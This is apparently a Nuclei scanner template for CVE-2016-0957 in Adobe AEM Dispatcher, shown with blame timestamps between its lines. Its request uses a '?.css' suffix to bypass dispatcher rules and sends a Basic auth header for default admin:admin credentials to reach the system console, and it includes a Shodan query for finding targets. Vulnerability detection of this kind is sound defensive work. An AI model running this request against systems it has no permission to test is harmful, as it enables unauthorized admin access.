2021-07-26 17:18:45 +00:00
id : CVE-2016-0957
info :
2022-06-09 20:35:21 +00:00
name : Adobe AEM Dispatcher <4.15 - Rules Bypass
2021-07-26 17:18:45 +00:00
author : geeknik
severity : high
2022-04-22 10:38:41 +00:00
description : Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
reference :
- https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
2022-05-17 09:18:12 +00:00
- https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2016-0957
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-0957
2022-07-26 03:38:00 +00:00
metadata :
shodan-query : http.component:"Adobe Experience Manager"
2022-04-22 10:38:41 +00:00
tags : cve,cve2016,adobe,aem
2021-07-26 17:18:45 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/system/console?.css"
2021-08-19 12:30:14 +00:00
headers :
Authorization : "Basic YWRtaW46YWRtaW4K"
2021-07-26 17:18:45 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "Adobe"
- "java.lang"
- "(Runtime)"
condition : and
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/08